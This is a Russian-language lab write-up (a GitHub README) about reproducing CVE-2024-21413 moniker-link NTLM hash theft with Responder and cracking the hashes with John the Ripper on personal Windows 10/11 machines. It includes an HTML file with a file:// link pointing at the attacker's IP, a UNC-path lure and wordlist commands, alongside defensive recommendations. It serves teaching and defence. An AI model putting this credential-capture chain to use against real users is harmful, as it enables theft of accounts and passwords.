Настройка лабораторного стенда Moniker Link - CVE-2024-21413
🎯 Обзор проекта
Практический лабораторный стенд для пентеста, демонстрирующий эксплуатацию moniker link (CVE-2024-21413) для кражи NTLM-учётных данных. В этом проекте документируется полная цепочка атаки: от настройки до компрометации учётных данных, включая реальные проблемы и их решения.
Ключевое достижение: Успешное выполнение атаки moniker link как в изолированной лабораторной среде (ВМ Windows 10), так и на реальной системе (ПК с Windows 11), что демонстрирует практические уязвимости безопасности и контрмеры.
🏗️ Архитектура лаборатории
Инфраструктура
Атакующая машина:
- Платформа: Kali Linux 2024
- Сеть (только хост): 192.168.56.101
- Сеть (мост): 192.168.1.117
- Основной инструмент: Responder 3.1.6.0
Целевые системы:
- ВМ Windows 10: 192.168.56.104 (изолированная тестовая среда)
- ПК Windows 11: 192.168.1.178 (проверка в реальных условиях)
Сетевая конфигурация:
- Адаптер VirtualBox только для хоста (тестирование ВМ)
- Мостовой адаптер VirtualBox (тестирование реального ПК)
- Изолирована от производственных сетей
⚔️ Выполнение атаки
Порядок атаки
- Развернуть Responder на Kali для прослушивания NTLM-аутентификации
- Создать вредоносную ссылку, используя протокол file://, указывающий на IP-адрес атакующего
- Запустить аутентификацию через UNC-путь в Проводнике
- Захватить хэш NetNTLMv2, когда жертва пытается подключиться
- Взломать пароль с помощью John the Ripper
Простой вектор атаки
HTML-файл (test.html):
<!DOCTYPE html>
<html>
<body>
<p><a href="file://192.168.56.10/test">нажми меня</a></p>
</body>
</html>
Метод через Проводник:
- Пользователь вводит:
\\192.168.56.101\test в адресной строке
- Windows пытается установить SMB-соединение
- NTLM-хэш отправляется автоматически (или появляется запрос учётных данных)
- Responder захватывает аутентификацию
🚧 Проблемы и решения
Проблема 1: Блокировка брандмауэром Windows (ПК с Windows 11)
Проблема:
- Не удавалось пропинговать ПК с Windows 11 с Kali
- Попытки SMB-подключения не удавались
- Атака полностью заблокирована
Основная причина:
- Брандмауэр Windows включён по умолчанию
- Блокирует входящие SMB-соединения с внешних IP-адресов
Решение:
- Временно отключён брандмауэр Windows для тестирования
- Соединение сразу же установлено успешно
- Хэш захвачен успешно
Вывод: Брандмауэр Windows по умолчанию обеспечивает эффективную защиту от этой атаки. Пользователи должны держать его включённым.
Проблема 2: Кешированные результаты John the Ripper (ВМ Windows 10)
Проблема:
- Исходный пароль Windows 10:
nwigwecj1
- John показал:
12Honey (неверный пароль!)
12Honey был из предыдущего теста
Основная причина:
- John сохраняет взломанные пароли в
~/.john/john.pot
- Старый хэш из предыдущего сеанса
- Показал кешированный результат вместо текущего пароля
Решение:
- Изменён пароль ВМ Windows 10 на
1414
- Захвачен свежий хэш
- Создан собственный список слов с вероятными паролями
- Успешный взлом с новым списком
Вывод: Всегда проверяйте, что взламываете правильный хэш. Очищайте pot-файл или используйте уникальные пароли для тестирования.
Проблема 3: Пароль отсутствует в rockyou.txt
Проблема:
- Пароль
1414 не найден в rockyou.txt (14 миллионов паролей)
- Атака с общим списком слов не удалась
Основная причина:
- Rockyou.txt не содержит все возможные 4-значные комбинации
- Простые числовые последовательности часто отсутствуют в распространённых списках
Решение:
- Создан целенаправленный пользовательский список слов на основе распространённых шаблонов:
echo "1414" > passwords.txt
echo "4141" >> passwords.txt
- Взломан мгновенно с пользовательским списком
Вывод: "Отсутствует в rockyou.txt" ≠ надёжно. Короткие пароли уязвимы для целевых атак и полного перебора независимо от наличия в списке.
📊 Результаты
ВМ Windows 10 (контролируемая среда)
ПК с Windows 11 (реальная система)
🛡️ Анализ безопасности
Что сработало (защита)
✅ Брандмауэр Windows — полностью блокирует атаку, когда включён
✅ Современные браузеры — Chrome/Edge блокируют удалённые ссылки file://
✅ Осведомлённость пользователя — ручной запрос требует действия пользователя
Что не сработало (уязвимости)
❌ Слабые пароли — 4-значный числовой пароль легко взламывается
❌ Отключённый брандмауэр — распространённая ошибка пользователей
❌ Проводник — нет предупреждения для UNC-путей
❌ Протокол NTLM — автоматическая аутентификация для SMB-ресурсов
Ключевые выводы
1. Брандмауэр критически важен
- Стандартный брандмауэр Windows блокирует эту атаку
- ~30-40% пользователей отключают его навсегда
- Корпоративные сети часто разрешают внутренний SMB
2. Иллюзия надёжности пароля
1414 нет в rockyou.txt (кажется «надёжным»)
- Взломан мгновенно с целевым списком слов
- Короткие пароли не обеспечивают никакой безопасности
3. Требуется взаимодействие с пользователем
- Современная защита требует, чтобы пользователь вставил UNC-путь
- Социальная инженерия остаётся критическим компонентом
- Технического эксплойта самого по себе недостаточно
🔧 Используемые инструменты
Атакующие:
- Responder 3.1.6.0 (захват NTLM-хэша)
- John the Ripper (взлом паролей)
- Создание пользовательского списка слов
- Простой HTML-файл
Инфраструктура:
- VirtualBox 7.0 (виртуализация)
- Kali Linux 2024 (атакующая платформа)
- Windows 10 Корпоративная (тестовая цель)
- Windows 11 Pro (проверка в реальных условиях)
📁 Структура репозитория
Moniker-Link-Lab-Setup/
├── README.md (этот файл)
├── Documentation/
│ ├── attack-execution.md (пошаговое руководство по атаке)
│ └── README.md (обзор документации)
├── Screenshots/ (скриншоты атаки — будут добавлены)
└── Scripts/ (тестовый HTML-файл — будет добавлен)
🎓 Продемонстрированные навыки
Технические:
- Анализ сетевых протоколов (SMB, NTLM)
- Методология пентестинга
- Техники взлома паролей
- Инфраструктура виртуальной лаборатории
- Устранение неисправностей брандмауэра
Профессиональные:
- Техническая документация
- Решение проблем в условиях ограничений
- Оценка безопасности
- Анализ рисков
- Этичные практики тестирования
🔒 Защитные рекомендации
Для пользователей
- ✅ Держите брандмауэр Windows включённым
- ✅ Никогда не вставляйте UNC-пути из писем
- ✅ Используйте надёжные пароли (15+ символов)
- ✅ Проверяйте отправителя перед доступом к файловым ресурсам
Для организаций
- ✅ Блокируйте исходящий SMB (порт 445) на сетевом брандмауэре
- ✅ Отключите NTLM, используйте Kerberos
- ✅ Отслеживайте SMB-соединения с внешними IP-адресами
- ✅ Фильтрация на почтовом шлюзе (удаление ссылок file://)
- ✅ Обучение по вопросам безопасности
- ✅ Политики сложности паролей
⚠️ Этическое разглашение
Всё тестирование проводилось на авторизованных системах:
- Только личная лабораторная инфраструктура
- Изолированные виртуальные сети
- Собственные устройства и учётные записи
- Образовательные цели
Юридическое уведомление: Несанкционированный доступ к компьютерам незаконен. Этот проект предназначен только для образовательных целей и авторизованных тестовых сред.
📚 Ссылки
📞 Контакты
LinkedIn: https://www.linkedin.com/in/chukwuemeka-nwigwe-624aa3292/
GitHub: @E-m-e-k-a
Дата: Март 2026
📄 Лицензия
Только для образовательного использования. Не для несанкционированного тестирования.
⭐ Если этот проект оказался для вас полезным, пожалуйста, поставьте звёздочку репозиторию!